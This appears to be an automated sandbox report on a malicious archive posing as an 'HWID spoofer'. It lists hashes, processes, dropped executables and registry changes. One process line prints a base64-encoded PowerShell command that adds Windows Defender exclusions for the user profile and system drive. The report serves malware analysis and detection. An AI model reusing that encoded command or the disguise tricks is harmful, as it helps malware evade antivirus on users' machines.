File name:

Sync HWID Spoоfer.rar

Full analysis: https://app.any.run/tasks/db59721f-6593-42c1-8673-7ebb1f24fb32
Verdict: Malicious activity
Analysis date: December 02, 2023, 07:31:56
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/x-rar
File info: RAR archive data, v5
MD5:

62540EA8B1974C5C8136CA5B18C6EAA5

SHA1:

12922E62EFB38E668B940A308CFF2D9305ECE410

SHA256:

1C32C4D5B682E1392CE4ADFF0AD36BC845824AFA9D241DB7E29A048482BDF8F9

SSDEEP:

98304:IgQOvP/DHlpBAcJZ9Vt76ryxYq5JTZrP5GoyyflLdEtQWdCY+E0NiSSWVAwcFkx5:ODuvrrzOOqNR+H

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Drops the executable file immediately after the start

      • sync_spoofer.exe (PID: 2076)
      • sp_componentbrowserFontDriverPerf.exe (PID: 2964)

  • SUSPICIOUS

    • Base64-obfuscated command line is found

      • sync_spoofer.exe (PID: 2076)

    • Reads the Internet Settings

      • sync_spoofer.exe (PID: 2076)

    • Starts POWERSHELL.EXE for commands execution

      • sync_spoofer.exe (PID: 2076)

    • BASE64 encoded PowerShell command has been detected

      • sync_spoofer.exe (PID: 2076)

    • Powershell version downgrade attack

      • powershell.exe (PID: 2132)

  • INFO

    • Checks supported languages

      • sync_spoofer.exe (PID: 2076)
      • sp_componentbrowserFontDriverPerf.exe (PID: 2964)

    • Drops the executable file immediately after the start

      • WinRAR.exe (PID: 844)

    • Reads the computer name

      • sync_spoofer.exe (PID: 2076)
      • sp_componentbrowserFontDriverPerf.exe (PID: 2964)

    • Creates files or folders in the user directory

      • sync_spoofer.exe (PID: 2076)

    • Reads the machine GUID from the registry

      • sp_componentbrowserFontDriverPerf.exe (PID: 2964)

    • Reads Environment values

      • sp_componentbrowserFontDriverPerf.exe (PID: 2964)

    • Reads product name

      • sp_componentbrowserFontDriverPerf.exe (PID: 2964)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rar | RAR compressed archive (v5.0) (61.5)
.rar | RAR compressed archive (gen) (38.4)
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
46
Monitored processes
5
Malicious processes
3
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winrar.exe no specs sync_spoofer.exe no specs sync_spoofer.exe powershell.exe no specs sp_componentbrowserfontdriverperf.exe

Process information

PID
CMD
Path
Indicators
Parent process
844"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Sync HWID Spoоfer.rar"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
2076"C:\Users\admin\AppData\Local\Temp\Rar$EXb844.30939\sync_spoofer.exe" C:\Users\admin\AppData\Local\Temp\Rar$EXb844.30939\sync_spoofer.exe
WinRAR.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Version:
1,2,0,0
Modules
Images
c:\users\admin\appdata\local\temp\rar$exb844.30939\sync_spoofer.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
2132"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAcwBmACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAcQB2ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAbgBwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAdwByACMAPgA="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exesync_spoofer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
2964"C:\Users\admin\AppData\Roaming\sp_componentbrowserFontDriverPerf.exe" C:\Users\admin\AppData\Roaming\sp_componentbrowserFontDriverPerf.exe
sync_spoofer.exe
User:
admin
Integrity Level:
HIGH
Exit code:
3221225477
Version:
16.10.31418.88
Modules
Images
c:\users\admin\appdata\roaming\sp_componentbrowserfontdriverperf.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
3872"C:\Users\admin\AppData\Local\Temp\Rar$EXb844.30939\sync_spoofer.exe" C:\Users\admin\AppData\Local\Temp\Rar$EXb844.30939\sync_spoofer.exeWinRAR.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
3221226540
Version:
1,2,0,0
Modules
Images
c:\users\admin\appdata\local\temp\rar$exb844.30939\sync_spoofer.exe
c:\windows\system32\ntdll.dll
Total events
3 959
Read events
3 856
Write events
103
Delete events
0

Modification events

(PID) Process:(844) WinRAR.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\17F\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(844) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:2
Value:
C:\Users\admin\Desktop\virtio_ivshmem_master_build.zip
(PID) Process:(844) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:1
Value:
C:\Users\admin\Desktop\Win7-KB3191566-x86.zip
(PID) Process:(844) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\Desktop\phacker.zip
(PID) Process:(844) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(844) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(844) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(844) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
(PID) Process:(844) WinRAR.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(844) WinRAR.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
Executable files
5
Suspicious files
3
Text files
1
Unknown types
0

Dropped files

PID
Process
Filename
Type
2964sp_componentbrowserFontDriverPerf.exeC:\Users\admin\Desktop\vgarXBgo.log
MD5:
SHA256:
2132powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\AMV649SBVKPV0BJNW1SW.tempbinary
MD5:16F6D260068B85896C0EBB2E1B2A60D1
SHA256:6E3B1EF1FB4736A9BF18FADF8E42935CC5053478B6F403A38EFBA8500E819984
2076sync_spoofer.exeC:\Users\admin\AppData\Roaming\conhost_sft.exeexecutable
MD5:673B523777D7F575004E47668BCEDFD2
SHA256:B255FD532CB851BE74F4D72CA572E34916D218138ABDAF9CD5C41298F3AEE903
2132powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:16F6D260068B85896C0EBB2E1B2A60D1
SHA256:6E3B1EF1FB4736A9BF18FADF8E42935CC5053478B6F403A38EFBA8500E819984
844WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXb844.30939\ChangeLog.txttext
MD5:5957F5923B5636CAC6B3D45D703FF51A
SHA256:ED088715797968F5F58EE9986EAD700CE546815BB0ACE6631D434936E1723758
2076sync_spoofer.exeC:\Users\admin\AppData\Roaming\HpsrSpoof.exeexecutable
MD5:DD1313842898FFAF72D79DF643637DED
SHA256:81B27A565D2EB4701C404E03398A4BCA48480E592460121BF8EC62C5F4B061DF
2076sync_spoofer.exeC:\Users\admin\AppData\Roaming\sp_componentbrowserFontDriverPerf.exeexecutable
MD5:D18283D6CFE1D4FD930F8B80EF786E86
SHA256:6D3FB4F323E7A18336F671001A885433418658E9AC244C6E9D8FB961340836B3
2132powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF20809e.TMPbinary
MD5:16F6D260068B85896C0EBB2E1B2A60D1
SHA256:6E3B1EF1FB4736A9BF18FADF8E42935CC5053478B6F403A38EFBA8500E819984
844WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXb844.30939\sync_spoofer.exeexecutable
MD5:7A09738F8033D766E8B03463389F0E20
SHA256:F5A8ADBB37CE76781117AAD88C8C4C9E2B8D7BDD3C3378AFDB7DC37C66134B59
2964sp_componentbrowserFontDriverPerf.exeC:\Users\admin\Desktop\lFquSIBM.logexecutable
MD5:D8BF2A0481C0A17A634D066A711C12E9
SHA256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
4
DNS requests
0
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
4
System
192.168.100.255:138
whitelisted
1080
svchost.exe
224.0.0.252:5355
unknown
2588
svchost.exe
239.255.255.250:1900
whitelisted

DNS requests

No data

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
Sync HWID Spoоfer.rar